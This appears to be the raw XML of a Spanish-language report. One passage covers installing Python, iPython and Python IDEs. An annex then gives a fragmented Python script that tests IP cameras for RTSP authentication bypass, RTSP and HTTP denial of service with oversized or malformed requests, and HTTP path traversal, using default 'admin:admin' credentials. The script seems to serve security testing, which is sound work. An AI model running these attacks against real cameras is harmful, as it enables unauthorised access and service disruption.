    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:r w:rsidRPr="009A4EEE">
        <w:t>PyPy, por último, como habréis adivinado por el nombre, se trata de una implementación en Python de Python.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRPr="009A4EEE" w:rsidRDefault="00B76284" w:rsidP="00B76284"/>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:r w:rsidRPr="009A4EEE">
        <w:t>CPython está instalado por defecto en la mayor parte de las distribuciones Linux y en las últimas versiones de Mac OS. Para comprobar si está instalado abre una terminal y escribe python. Si está instalado se iniciará la consola interactiva de Python y obtendremos parecido a lo siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881E2C" w:rsidRPr="00881E2C" w:rsidRDefault="00881E2C" w:rsidP="00881E2C"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="-35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837"/>
      </w:tblGrid>
      <w:tr w:rsidR="00881E2C" w:rsidRPr="00881E2C">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="970"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6837" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00881E2C" w:rsidRPr="00881E2C" w:rsidRDefault="00881E2C" w:rsidP="00881E2C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881E2C">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Python 2.5.1 (r251:54863, May 2 2007, 16:56:35)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00881E2C" w:rsidRPr="00881E2C" w:rsidRDefault="00881E2C" w:rsidP="00881E2C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881E2C">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>[GCC 4.1.2 (Ubuntu 4.1.2-0ubuntu4)] on linux2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00881E2C" w:rsidRPr="00881E2C" w:rsidRDefault="00881E2C" w:rsidP="00881E2C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881E2C">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Type “help”, “copyright”, “credits” or “license” for more information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B76284" w:rsidRPr="009A4EEE" w:rsidRDefault="00B76284" w:rsidP="00B76284"/>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="161" w:lineRule="atLeast"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
          <w:color w:val="221E1F"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:r w:rsidRPr="009A4EEE">
        <w:t>La primera línea nos indica la versión de Python que tenemos instalada. Al final podemos ver el prompt (&gt;&gt;&gt;) que nos indica que el intérprete está esperando código del usuario. Podemos salir escribiendo exit(), o pulsando Control + D.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRPr="009A4EEE" w:rsidRDefault="00B76284" w:rsidP="00B76284"/>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:r w:rsidRPr="009A4EEE">
        <w:t xml:space="preserve">Si no te muestra algo parecido no te preocupes, instalar Python es muy sencillo. Puedes descargar la versión correspondiente a tu sistema operativo desde la web de Python, en </w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>http://www.python.org/download/.</w:t>
      </w:r>
      <w:r w:rsidRPr="009A4EEE">
        <w:t xml:space="preserve"> Existen instaladores para Windows y Mac OS. Si utilizas Linux es muy probable que puedas instalarlo usando la herramienta de gestión de paquetes de tu distribución, aunque también podemos descargar la aplicación compilada desde la web de Python.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284"/>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="221" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r w:rsidRPr="00B76284">
        <w:t>Existen dos formas de ejecutar código Python. Podemos escribir líneas de código en el intérprete y obtener una respuesta del intérprete para cada línea (sesión interactiva) o bien podemos escribir el código de un programa en un archivo de texto y ejecutarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRPr="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="221" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="221" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r w:rsidRPr="00B76284">
        <w:t xml:space="preserve">A la hora de realizar una sesión interactiva os aconsejo instalar y utilizar iPython, en lugar de la consola interactiva de Python. Se puede encontrar en </w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>http://ipython.scipy.org/.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:t xml:space="preserve"> iPython cuenta con características añadidas muy interesantes, como el autocompletado o el operador ?. (para activar la característica de autocompletado en Windows es necesario instalar PyReadline, que puede descargarse desde</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>http://ipython.scipy.org/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>moin/PyReadline/Intro</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRPr="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="221" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="221" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r w:rsidRPr="00B76284">
        <w:t>La función de autocompletado se lanza pulsando el tabulador. Si escribimos fi y pulsamos Tab nos mostrará una lista de los objetos que comienzan con fi (file, filter y finally). Si escribimos file. y pulsamos Tab nos mostrará una lista de los métodos y propiedades del objeto file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRPr="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="221" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="221" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r w:rsidRPr="00B76284">
        <w:t>El operador ? nos muestra información sobre los objetos. Se utiliza añadiendo el símbolo de interrogación al final del nombre del objeto del cual queremos más información. Por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881E2C" w:rsidRPr="00881E2C" w:rsidRDefault="00881E2C" w:rsidP="00881E2C"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="-350"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6837"/>
      </w:tblGrid>
      <w:tr w:rsidR="00881E2C" w:rsidRPr="00881E2C">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="546"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6837" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>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In [3]: str?</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Type: type</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Base Class:</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String Form:</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Namespace: Python builtin</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Docstring:</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str(object) -&gt; string</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Return a nice string representation of the object.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00881E2C" w:rsidRPr="00881E2C" w:rsidRDefault="00881E2C" w:rsidP="00881E2C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="2" w:after="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881E2C">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve">If the argument is a string, the return value is the same object. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B76284" w:rsidRPr="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="221" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRPr="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="161" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRPr="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="221" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r w:rsidRPr="00B76284">
        <w:t>En el campo de IDEs y editores de código gratuitos PyDEV (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>http://pydev.sourceforge.net/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:rPr>
          <w:color w:val="1F497D" w:themeColor="text2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:t xml:space="preserve"> se alza como cabeza de serie. PyDEV es un plugin para Eclipse que permite utilizar este IDE multiplataforma para programar en Python. Cuenta con autocompletado de código (con información sobre cada elemento), resaltado de sintaxis, un depurador gráfico, resaltado de errores, explorador de clases, formateo del código, refactorización, etc. Sin duda es la opción más completa, sobre todo si instalamos las extensiones comerciales, aunque necesita de una cantidad importante de memoria y no es del todo estable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRPr="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="221" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r w:rsidRPr="00B76284">
        <w:t>Otras opciones gratuitas a considerar son SPE o Stani’s Python Editor (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>http://sourceforge.net/projects/spe/),</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:t xml:space="preserve"> Eric (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>http://die-offenbachs.de/eric/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:t>), BOA Constructor (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>http://boa-constructor.sourceforge.net/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:t>) o incluso emacs o vim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRPr="009A4EEE" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:r w:rsidRPr="00B76284">
        <w:t>Si no te importa desembolsar algo de dinero, Komodo (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>http://www.activestate.com/komodo_ide/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:t>) y Wing IDE (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>http://www.wingware.com/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B76284">
        <w:t>) son también muy buenas opciones, con montones de características interesantes, como PyDEV, pero mucho más estables y robustos. Además, si desarrollas software libre no comercial puedes contactar con Wing Ware y obtener, con un poco de suerte, una licencia gratuita para Wing IDE Professional</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516BFA" w:rsidRDefault="00516BFA" w:rsidP="00C84B17"/>
    <w:p w:rsidR="00516BFA" w:rsidRDefault="00516BFA" w:rsidP="00516BFA">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t>Anexo 3: Código</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF7A06" w:rsidRDefault="00516BFA" w:rsidP="00516BFA">
      <w:r>
        <w:t>El código del script es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005647FD" w:rsidRDefault="005647FD" w:rsidP="00516BFA"/>
    <w:p w:rsidR="005647FD" w:rsidRPr="007E31D4" w:rsidRDefault="005647FD" w:rsidP="005647FD"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="-1431" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="12" w:space="0" w:color="000000"/>
        </w:tblBorders>
        <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="70" w:type="dxa"/>
          <w:right w:w="70" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="00BF"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8515"/>
      </w:tblGrid>
      <w:tr w:rsidR="005647FD" w:rsidRPr="007E31D4">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="4090"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8515" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>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import</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> socket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import</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> base64</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import</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> sys</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from</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> time </w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>import</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> gmtime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strftime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Possible Responses</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HTTP_404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'HTTP/1.1 404 Not Found'</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HTTP_400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'HTTP/1.1 400 Bad Request'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RTSP_401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'RTSP/1.0 401 Unauthorized'</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RTSP_PORT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554</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HTTP_PORT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80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DEF_USER_PASS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'admin:admin'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fIpCams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"ipCams.txt"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get_date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hoy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strftime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"%Y-%m-%d %H:%M:%S"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gmtime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r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> hoy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string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prtscr</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g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"output.log"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write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get_date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string</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prtscr</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print</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> string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TEST RTSP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rtsp_auth_describe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 xml:space="preserve">####### </w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Authentication Bypass - Testing DESCRIBE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00881E2C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">":::::::: </w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">RTSP Authentication Bypass - Testing DESCRIBE"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"rtspUris.txt"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_uri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_uri</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"Testing URI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'DESCRIBE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RTSP/1.0\r\n'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'CSeq: 1\r\n'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RTSP_401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rtsp_auth_setup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Authentication Bypass - Testing SETUP</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RTSP Authentication Bypass - Testing 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"rtspUris.txt"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_uri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_uri</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"Testing URI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'SETUP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RTSP/1.0\r\n'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'CSeq: 1\r\n'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'Transport: RTP/AVP;unicast;client_port=4588-4589\r\n'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RTSP_401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rtsp_auth_play</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Authentication Bypass - Testing PLAY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RTSP Authentication Bypass - Testing PLAY"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"rtspUris.txt"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_uri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_uri</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"Testing URI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'PLAY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RTSP/1.0\r\n'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'CSeq: 1\r\n'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RTSP_401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rtsp_auth_teardown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Authentication Bypass - Testing TEARDOWN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 Authentication Bypass - Testing TEARDOWN"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"rtspUris.txt"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_uri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_uri</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"Testing URI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'TEARDOWN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RTSP/1.0\r\n'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'CSeq: 1\r\n'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RTSP_401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rtsp_dos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_cam_ip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 Denial Of Service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RTSP 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"rtspUris.txt"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_uri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_uri</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"Testing URI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auth_big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'a'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3000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'DESCRIBE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uri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RTSP/1.0\r\n'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'CSeq: 1\r\n'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'Authorization: Basic %s\r\n'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base64</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b64encode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auth_big</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"Trying to connect again..."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rtspUris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rtsp_dos_setup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Denial Of Service 2</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RTSP DoS - Malformed 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setRequest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'SETUP / RTSP/1.0\r\n\r\n'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"Trying to connect again..."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RTSP_PORT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TEST HTTP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http_dos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 Denial Of Service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HTTP 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'GET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"A"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3000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'.html HTTP/1.0\r\n'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HTTP_PORT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HTTP_PORT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"Trying to connect again..."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HTTP_PORT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def</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> http_path</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try:</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 Path Transversal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HTTP Path Transversal"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fPathTransversal</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"pathTransversal.txt"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linea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fPathTransversal</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'GET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linea</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HTTP/1.0\r\n'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request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socket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socket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connect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cam_ip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HTTP_PORT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"Connected to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cam_ip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RTSP_PORT</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send</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request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recv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1024</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HTTP_400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 </w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> HTTP_404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response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OK"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FAILED!!!!!"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response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"Disconnected"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fPathTransversal</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close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except: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"Unexpected error:"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str</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exc_info</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return</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__name__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'__main__'</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len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argv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&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2</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"Arguments are necesary!!"</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TEST_RTSP_AUTH_DESCRIBE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TEST_RTSP_AUTH_PLAY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TEST_RTSP_AUTH_TEARDOWN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TEST_RTSP_DOS_2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TEST_HTTP_DOS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TEST_HTTP_PATH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0</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x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xrange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len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argv</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sys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argv</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x</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'-rAD'</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TEST_RTSP_AUTH_DESCRIBE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'-rAS'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'-rAP'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TEST_RTSP_AUTH_PLAY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'-rAT'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TEST_RTSP_AUTH_TEARDOWN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'-rA'</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TEST_RTSP_AUTH_DESCRIBE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TEST_RTSP_AUTH_PLAY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TEST_RTSP_AUTH_TEARDOWN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'-rD'</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'-rD2'</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TEST_RTSP_DOS_2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'-hD'</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TEST_HTTP_DOS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elif</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> action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'-hP'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TEST_HTTP_PATH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else:</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"Wrong Argument!!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action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fIpCams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open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"ipCams.txt"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for</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> _ip </w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>in</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> fIpCams</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_ip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replace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w:t>
            </w:r>
            <w:r w:rsidR="00881E2C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#############</w:t>
            </w:r>
            <w:r w:rsidRPr="00014FC6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
